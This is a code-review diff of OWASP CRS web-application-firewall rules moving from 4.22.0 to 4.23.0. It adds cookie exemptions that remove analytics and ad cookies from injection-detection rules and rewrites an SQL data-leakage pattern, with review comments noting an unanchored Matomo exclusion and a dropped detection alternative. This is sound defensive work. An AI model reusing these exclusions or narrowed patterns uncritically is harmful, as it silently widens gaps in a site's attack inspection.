tx.detection_paranoia_level is sufficiently high: 1 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule 
TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-999-COMMON-EXCEPTIONS-AFTER.conf b/rules/REQUEST-999-COMMON-EXCEPTIONS-AFTER.conf new file mode 100644 index 0000000000..03945486f6 --- /dev/null +++ b/rules/REQUEST-999-COMMON-EXCEPTIONS-AFTER.conf 
@@ -0,0 +1,99 @@ +# ------------------------------------------------------------------------ +# OWASP CRS ver.4.23.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2026 CRS project. All rights reserved. +# +# The OWASP CRS is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# This file is used as an exception mechanism to remove common false positives +# that may be encountered. This file does not contain any runtime rule-exclusions +# and so it must loaded after all the request rules have been created. + +# To have a standard order, please: +# +# 1. Keep all the exceptions that target the same cookie (or cookie regexp together) +# 2. Order them by rule id. +# 3. Add a blank line when the cookie/cookie regexp changes, so it shows visually + +# Google Analytics Cookies +# Matches: +# _ga +# _ga_5WLQM4K1ZX +SecRuleUpdateTargetById 932240 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" +SecRuleUpdateTargetById 941100 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" +SecRuleUpdateTargetById 942290 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" +SecRuleUpdateTargetById 942550 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" + +# Google Ads Cookie +SecRuleUpdateTargetById 941100 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942290 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942550 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:__gpi" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:__gpi" + +# Google Funding Choices cookie +SecRuleUpdateTargetById 941100 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942290 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942340 "!REQUEST_COOKIES:FCCDCF" 
+SecRuleUpdateTargetById 942370 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942490 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942550 "!REQUEST_COOKIES:FCCDCF" + +# Security cookie for Google Ads +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:__eoi" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:__eoi" + +# Google Analytics Funding Choices cookie +SecRuleUpdateTargetById 942340 "!REQUEST_COOKIES:FCNEC" +SecRuleUpdateTargetById 942370 "!REQUEST_COOKIES:FCNEC" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:FCNEC" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:FCNEC" + +# Prebid.js share cookie +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:sharedid" + +# Microsoft Clarity tracking cookie +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:_clsk" + +# Microsoft Clarity marketing cookie +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:_clck" + +# AWS Load balancer cookie +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:_awl" + +# Prebid.js Cookie +# Matches: +# pbjs-id5id +SecRuleUpdateTargetById 941100 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942200 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942290 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942340 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942370 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942490 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942550 "!REQUEST_COOKIES:/^pbjs-\w+$/" + +# Matomo Referer Cookie +SecRuleUpdateTargetById 941320 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 941330 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 941340 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942370 "!REQUEST_COOKIES:/^_pk_ref/" 
+SecRuleUpdateTargetById 942380 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942390 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942400 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942410 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942440 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942450 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942470 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942480 "!REQUEST_COOKIES:/^_pk_ref/" diff --git a/rules/RESPONSE-950-DATA-LEAKAGES.conf b/rules/RESPONSE-950-DATA-LEAKAGES.conf index d2db41a08e..f2a9226e3c 100644 --- a/rules/RESPONSE-950-DATA-LEAKAGES.conf +++ b/rules/RESPONSE-950-DATA-LEAKAGES.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -29,7 +29,7 @@ SecRule TX:crs_skip_response_analysis "@eq 1" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION" # Skip all rules if RESPONSE_BODY is compressed. 
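Review bot: The Matomo exclusion `!REQUEST_COOKIES:/^_pk_ref/` is the only cookie pattern in the new file that is not terminated with `$`, so it removes every cookie whose name merely begins with `_pk_ref` from the fourteen rules 941320 through 942480, whereas the Google and Prebid patterns are fully anchored; if the prefix match is deliberate, presumably because the cookie name carries a variable suffix, a comment above that stanza should say so, e.g. `# Matomo appends a variable suffix to the cookie name, so only the prefix is matched`, otherwise the pattern should be bounded like the others. Every `SecRuleUpdateTargetById` line here permanently removes that cookie's value from the named rule's inspection, which is the expected trade-off for a false-positive exception but worth stating in the file header so operators understand what they are giving up when they include this file. The header also has a typo, `it must loaded after` should read `it must be loaded after`, and the first ordering bullet reads better as `Keep all the exceptions that target the same cookie (or cookie regexp) together`.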
@@ -40,11 +40,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -68,7 +68,7 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Inde tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ tag:'capec/1000/118/116/54/127',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -100,7 +100,7 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" 
@@ -123,13 +123,13 @@ SecRule RESPONSE_BODY "@pmFromFile asp-dotnet-errors.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ tag:'capec/1000/118/116/54/127',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # 
@@ -153,22 +153,22 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ tag:'capec/1000/152',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf index 3fc61ad918..c31c907368 100644 --- a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf +++ b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf 
@@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -48,7 +48,7 @@ SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-SQL-ERROR-MATCH-PL1" SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \ 
@@ -67,7 +67,7 @@ SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Micr tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -93,7 +93,7 @@ SecRule RESPONSE_BODY "@rx (?i)\bORA-[0-9][0-9][0-9][0-9][0-9]:|java\.sql\.SQLEx tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -114,7 +114,7 @@ SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]| tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -135,7 +135,7 @@ SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinit tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -156,7 +156,7 @@ SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" 
@@ -177,7 +177,7 @@ SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollba tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -198,7 +198,7 @@ SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -219,7 +219,7 @@ SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statem tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -240,7 +240,7 @@ SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" 
@@ -261,12 +261,12 @@ SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" -SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ +SecRule RESPONSE_BODY "@rx (?i)Warning.{1,10}maxdb[\(\)_a-z:]{1,26}:" \ "id:951210,\ phase:4,\ block,\ @@ -282,7 +282,7 @@ SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -303,7 +303,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsof tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -329,7 +329,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.* tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" 
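Review bot: The rewritten 951210 operator drops the `SQL error.*POS[0-9]+` alternative entirely, so a response that contains an `SQL error ... POS n` message but no `Warning...maxdb...:` fragment is no longer scored as an SQL data leakage at PL1; if that narrowing is intended it should be recorded next to the rule, e.g. `# NOTE: the 'SQL error.*POS[0-9]+' alternative was dropped in 4.23.0; see CHANGES.md`, otherwise the alternative should be kept in a bounded form. Replacing the unbounded `.*` quantifiers with `.{1,10}` and `[\(\)_a-z:]{1,26}` is a sound hardening against catastrophic backtracking on large response bodies and should be kept. Because the new pattern now requires a trailing `:`, the regression tests for 951210 should cover the exact MaxDB warning format the rule is meant to catch, since a message that omits the colon will silently stop matching. The remainder of rule 951210 (its tags, ver and setvar actions) continues outside this hunk.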
@@ -355,7 +355,7 @@ SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -376,7 +376,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_|Warning.*SQLite3::|SQLite/JDB tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -397,7 +397,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*S tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" 
@@ -405,24 +405,24 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*S SecMarker "END-SQL-ERROR-MATCH-PL1" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" 